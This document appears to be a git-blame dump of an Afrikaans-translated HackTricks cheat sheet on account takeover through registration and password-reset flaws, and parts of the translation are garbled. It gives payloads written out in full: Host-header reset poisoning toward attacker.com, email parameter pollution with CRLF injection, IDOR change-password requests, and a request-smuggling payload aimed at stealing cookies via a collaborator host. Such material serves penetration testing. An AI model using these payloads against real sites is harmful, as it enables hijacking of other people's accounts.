2024-07-19 16:15:11 +00:00
# Registrasie & Oorname Kw vulnerabilities
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Leer & oefen GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
< summary > Ondersteun HackTricks< / summary >
2024-02-03 14:45:32 +00:00
2024-07-19 16:15:11 +00:00
* Kyk na die [**subskripsie planne** ](https://github.com/sponsors/carlospolop )!
* **Sluit aan by die** 💬 [**Discord groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram groep** ](https://t.me/peass ) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-09-04 13:35:49 +00:00
* **Deel hacking truuks deur PR's in te dien na die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) en [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:15:11 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-04-18 03:37:31 +00:00
2024-04-18 04:05:40 +00:00
## Registrasie Oorname
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
### Dubbele Registrasie
2021-06-27 14:55:59 +00:00
2024-09-04 13:35:49 +00:00
* Probeer om te genereer met 'n bestaande gebruikersnaam
2024-07-19 16:15:11 +00:00
* Kyk na verskillende e-pos:
* hoofletters
* \+1@
* voeg 'n punt in die e-pos by
* spesiale karakters in die e-pos naam (%00, %09, %20)
* Sit swart karakters na die e-pos: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
2021-06-27 14:55:59 +00:00
2024-04-18 03:37:31 +00:00
### Gebruikersnaam Enumerasie
2021-06-27 14:55:59 +00:00
2024-07-19 16:15:11 +00:00
Kyk of jy kan uitvind wanneer 'n gebruikersnaam reeds binne die toepassing geregistreer is.
2021-06-27 14:55:59 +00:00
2024-02-11 02:07:06 +00:00
### Wagwoordbeleid
2021-06-27 14:55:59 +00:00
2024-04-18 03:37:31 +00:00
Skep 'n gebruiker en kyk na die wagwoordbeleid (kyk of jy swak wagwoorde kan gebruik).\
2024-07-19 16:15:11 +00:00
In daardie geval kan jy probeer om akrediteer te bruteforce.
2021-06-27 14:55:59 +00:00
2024-07-19 16:15:11 +00:00
### SQL Inbraak
2021-06-27 14:55:59 +00:00
2024-07-19 16:15:11 +00:00
[**Kyk na hierdie bladsy** ](sql-injection/#insert-statement )om te leer hoe om rekeningoorname te probeer of inligting te onttrek via **SQL Inbrake** in registrasievorms.
2021-06-27 14:55:59 +00:00
2024-04-18 04:05:40 +00:00
### Oauth Oorname
2021-06-27 14:55:59 +00:00
2023-02-16 18:26:56 +00:00
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md ](oauth-to-account-takeover.md )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-06-27 14:55:59 +00:00
2024-07-19 16:15:11 +00:00
### SAML Kw vulnerabilities
2021-06-27 14:55:59 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="saml-attacks/" %}
[saml-attacks ](saml-attacks/ )
{% endcontent-ref %}
2021-06-27 15:43:01 +00:00
2024-02-11 02:07:06 +00:00
### Verander E-pos
2021-06-27 15:43:01 +00:00
2024-07-19 16:15:11 +00:00
Wanneer geregistreer, probeer om die e-pos te verander en kyk of hierdie verandering korrek geverifieer word of of jy dit na arbitrêre e-posse kan verander.
2021-06-27 14:55:59 +00:00
2024-02-11 02:07:06 +00:00
### Meer Kontroles
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
* Kyk of jy **weggooie e-posse** kan gebruik
2024-02-11 02:07:06 +00:00
* **Lang** **wagwoord** (>200) lei tot **DoS**
2024-07-19 16:15:11 +00:00
* **Kyk na koerslimiete op rekening skep**
2024-09-04 13:35:49 +00:00
* Gebruik username@**burp\_collab**.net en analiseer die **terugroep**
2024-04-18 03:37:31 +00:00
2024-04-18 04:05:40 +00:00
## **Wagwoord Herstel Oorname**
2024-04-18 03:37:31 +00:00
2024-07-19 16:15:11 +00:00
### Wagwoord Herstel Token Lek Via Verwysing <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
2024-04-18 03:37:31 +00:00
2024-07-19 16:15:11 +00:00
1. Versoek wagwoord herstel na jou e-pos adres
2. Klik op die wagwoord herstel skakel
3. Moet nie wagwoord verander nie
2024-04-18 04:05:40 +00:00
4. Klik op enige 3de party webwerwe (bv: Facebook, twitter)
2024-07-19 16:15:11 +00:00
5. Intercepteer die versoek in Burp Suite proxy
2024-09-04 13:35:49 +00:00
6. Kyk of die verwysingskop lek wagwoord herstel token.
2024-04-18 03:37:31 +00:00
2024-09-04 13:35:49 +00:00
### Wagwoord Herstel Besmetting <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
2024-04-18 03:37:31 +00:00
2024-07-19 16:15:11 +00:00
1. Intercepteer die wagwoord herstel versoek in Burp Suite
2. Voeg of wysig die volgende koppe in Burp Suite : `Host: attacker.com` , `X-Forwarded-Host: attacker.com`
2024-09-04 13:35:49 +00:00
3. Stuur die versoek met die gewysigde kop\
2024-04-18 03:37:31 +00:00
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
2024-07-19 16:15:11 +00:00
4. Soek na 'n wagwoord herstel URL gebaseer op die _host kop_ soos : `https://attacker.com/reset-password.php?token=TOKEN`
2024-04-18 03:37:31 +00:00
2024-04-18 04:05:40 +00:00
### Wagwoord Herstel Via E-pos Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
2021-11-30 00:17:48 +00:00
```powershell
# parameter pollution
email=victim@mail.com& email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
2024-07-19 16:15:11 +00:00
### IDOR op API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
1. Aanvaller moet met hul rekening aanmeld en na die **Verander wagwoord** funksie gaan.
2024-05-05 22:31:04 +00:00
2. Begin die Burp Suite en onderskep die versoek.
2024-09-04 13:35:49 +00:00
3. Stuur dit na die herhaler-oortjie en wysig die parameters: Gebruiker ID/e-pos\
2024-07-19 16:15:11 +00:00
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
### Swak Wagwoord Herstel Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
Die wagwoord herstel token moet ewekansig gegenereer en uniek wees elke keer.\
Probeer om te bepaal of die token verval of as dit altyd dieselfde is, in sommige gevalle is die generasie-algoritme swak en kan dit geraai word. Die volgende veranderlikes mag deur die algoritme gebruik word.
2021-11-30 00:17:48 +00:00
2024-04-18 03:37:31 +00:00
* Tydstempel
2024-07-19 16:15:11 +00:00
* GebruikerID
2024-04-18 03:37:31 +00:00
* E-pos van Gebruiker
* Voornaam en Van
2024-02-11 02:07:06 +00:00
* Geboortedatum
2024-04-18 03:37:31 +00:00
* Kriptografie
2024-07-19 16:15:11 +00:00
* Slegs nommers
* Klein token volgorde (karakters tussen \[A-Z,a-z,0-9])
* Token hergebruik
* Token vervaldatum
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
### Lekke Wagwoord Herstel Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
1. Trigger 'n wagwoord herstel versoek deur die API/UI vir 'n spesifieke e-pos bv: test@mail.com
2. Ondersoek die bediener se antwoord en kyk vir `resetToken`
3. Gebruik dan die token in 'n URL soos `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
### Wagwoord Herstel Deur Gebruikersnaam Botsing <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
1. Registreer op die stelsel met 'n gebruikersnaam wat identies is aan die slagoffer se gebruikersnaam, maar met spasie voor en/of na die gebruikersnaam ingevoeg. bv: `"admin "`
2. Versoek 'n wagwoord herstel met jou kwaadwillige gebruikersnaam.
3. Gebruik die token wat na jou e-pos gestuur is en herstel die slagoffer se wagwoord.
2024-09-04 13:35:49 +00:00
4. Maak verbinding met die slagoffer se rekening met die nuwe wagwoord.
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
Die platform CTFd was kwesbaar vir hierdie aanval.\
2024-04-18 03:37:31 +00:00
Sien: [CVE-2020-7245 ](https://nvd.nist.gov/vuln/detail/CVE-2020-7245 )
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
### Rekening Oorname Deur Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
2021-11-30 00:17:48 +00:00
2024-09-04 13:35:49 +00:00
1. Vind 'n XSS binne die toepassing of 'n subdomein as die koekies op die ouerdomein geskope is: `*.domain.com`
2024-07-19 16:15:11 +00:00
2. Lek die huidige **sessies koekie**
3. Verifieer as die gebruiker met behulp van die koekie
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
### Rekening Oorname Deur HTTP Versoek Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
1\. Gebruik **smuggler** om die tipe HTTP Versoek Smuggling (CL, TE, CL.TE) te detecteer\
2021-11-30 00:17:48 +00:00
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h` \
2024-07-19 16:15:11 +00:00
2\. Stel 'n versoek op wat die `POST / HTTP/1.1` met die volgende data sal oorskryf:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` met die doel om die slagoffers na burpcollab te herlei en hul koekies te steel\
2024-09-04 13:35:49 +00:00
3\. Finale versoek kan soos volg lyk
2021-11-30 00:17:48 +00:00
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
2024-07-19 16:15:11 +00:00
Hackerone verslae wat hierdie fout benut\
2024-05-05 22:31:04 +00:00
\* [https://hackerone.com/reports/737140 ](https://hackerone.com/reports/737140 )\
\* [https://hackerone.com/reports/771666 ](https://hackerone.com/reports/771666 )
2024-04-18 04:05:40 +00:00
2024-07-19 16:15:11 +00:00
### Rekening Oorname via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
1. Skep 'n payload vir die CSRF, bv: “HTML vorm met outomatiese indiening vir 'n wagwoord verandering”
2. Stuur die payload
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
### Rekening Oorname via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
2021-11-30 00:17:48 +00:00
2024-09-04 13:35:49 +00:00
JSON Web Token kan gebruik word om 'n gebruiker te verifieer.
2021-11-30 00:17:48 +00:00
2024-07-19 16:15:11 +00:00
* Wysig die JWT met 'n ander Gebruiker ID / E-pos
* Kontroleer vir swak JWT handtekening
2021-11-30 00:17:48 +00:00
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md ](hacking-jwt-json-web-tokens.md )
{% endcontent-ref %}
2024-02-11 02:07:06 +00:00
## Verwysings
2021-11-30 00:17:48 +00:00
* [https://salmonsec.com/cheatsheet/account\_takeover ](https://salmonsec.com/cheatsheet/account\_takeover )
2022-04-28 16:01:33 +00:00
2024-04-18 03:37:31 +00:00
2024-07-19 16:15:11 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Leer & oefen GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
< summary > Ondersteun HackTricks< / summary >
2024-02-03 14:45:32 +00:00
2024-09-04 13:35:49 +00:00
* Kyk na die [**subskripsie planne** ](https://github.com/sponsors/carlospolop )!
2024-07-19 16:15:11 +00:00
* **Sluit aan by die** 💬 [**Discord groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram groep** ](https://t.me/peass ) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) en [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:15:11 +00:00
{% endhint %}